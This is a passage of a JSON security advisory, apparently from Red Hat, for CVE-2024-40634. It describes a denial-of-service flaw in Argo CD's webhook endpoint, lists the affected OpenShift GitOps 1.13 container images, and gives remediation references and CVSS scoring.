"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64"
},
"product_reference": "openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"relates_to_product_reference": "8Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"relates_to_product_reference": "9Base-GitOps-1.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64 as a component of Red Hat OpenShift GitOps 1.13",
"product_id": "9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64",
"relates_to_product_reference": "9Base-GitOps-1.13"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-40634",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-23T14:26:36+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2299473"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-40634"
},
{
"category": "external",
"summary": "RHBZ#2299473",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299473"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-40634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40634"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
}
],
"release_date": "2024-07-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-26T20:58:31+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:343c542d45bf52fda4742183d60422d36c15615105f990a180fee0b15dcd82d0_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:65bcc82d88275ce84eb21c2a88a6f4d32bbb8c5e28d34e7de4ee19cc3dddedac_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/argocd-rhel8@sha256:8814381fb164cc04ff0764a45c4ab36bbf95c64950c6667e78ba3b7dbef85a57_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:01159dc5aad803a0812003320a9cca4b23a34e8b1d037dbe5437b064a41a5a33_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:5e2c4a47afa8f147b140abac309cdb1f6c92186170a0180f76acff3526557fde_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:a8399eae8d0e6810a1a340bb80df08ae49ff1c0eff4eea39c8c929ef5a5d6e37_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:63625a8587f9836d55817fbefce372cf294ce5ed3c7d0c4ca1738762aef0b892_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:94a08e73f086c275689d3b0da814f7cda6f011a991db0aa1312d3f025d866924_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/dex-rhel8@sha256:983356f0dbd9205281f335f3eb3fe2b6d9a82559d0329f622e3d309974fd7ef2_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-operator-bundle@sha256:b19fb714784fa74033214d26a368ec13b26452772c0c0384c569c266392234bd_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:25424a9311ba9557e8d07bb199a3bf4a341c5d86be36417728687b417c52cfbf_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:26796accb8e20fc14ea607742a828818cfad7d32a390f71c6cd9ea8e20079f85_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:738ad84244e4845d985d3f211f3bdc887b89ca562d54909042813c2291345ce2_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8-operator@sha256:f010f82179b4081c06c367227211252b1cdcf664b90da44a0cba15e0000f110a_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:ba0877e9ea66210a3a47d33369919e425b3e39879832d0425971af56b04da716_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:bda876b4b557ab3e1a0a9d422d784eeb8bd830cb988932eb9b0f6388631ad738_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/gitops-rhel8@sha256:e36a69825f19867f5f455816f9aca377ae0572f32729ab035b66adce8bcef70c_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:0c8ce44b0860558edb8e8cc27e9c54b92b34b6b3517f4f357455085eb3d9d30d_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:731ef52b2be3f011a77d153740e3eac09f84e5098f7fbf78584c399d498a9f8d_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:ca6139f39423508388f5f8493430113e343e41b4215560b48d7ccb088ab05f1a_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:5444ffeeeac5446b3212b06d99256e736048e876125fc65753ce6de9017c25fd_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:a20821b1e70daa6d6c89d477584ef65ec421eb0e76a9fca6d00e74d2bed620ef_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:bfb27b8b743b72b93a8e92db93a11a589ee17cdef2d94bdfeeda4c79a20862c4_arm64",
"8Base-GitOps-1.13:openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:3cfd0ec979b85445f44648d03118591e3c87f6502a33e27812955151151a9654_amd64",
"9Base-GitOps-1.13:openshift-gitops-1/argocd-rhel9@sha256:47bf94148d5c374326ebf24e0a5e5a2eefd57f8cd55611e1b9bca787d5690992_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4891"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:1597d12f5d487572ecd9afe88e512e1f620599a6a47312cdb0e5ea6fcc4c9b36_ppc64le",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:19f678df553293e30b56f28ed32e90f72648649a5d5b89c4be59dcf912c6e9fa_amd64",
"8Base-GitOps-1.13:openshift-gitops-1/argo-rollouts-rhel8@sha256:204979b5d35350c0f055d9203a6ba2260b3240a5ecee5f9bb43f5468076a69f3_arm64",
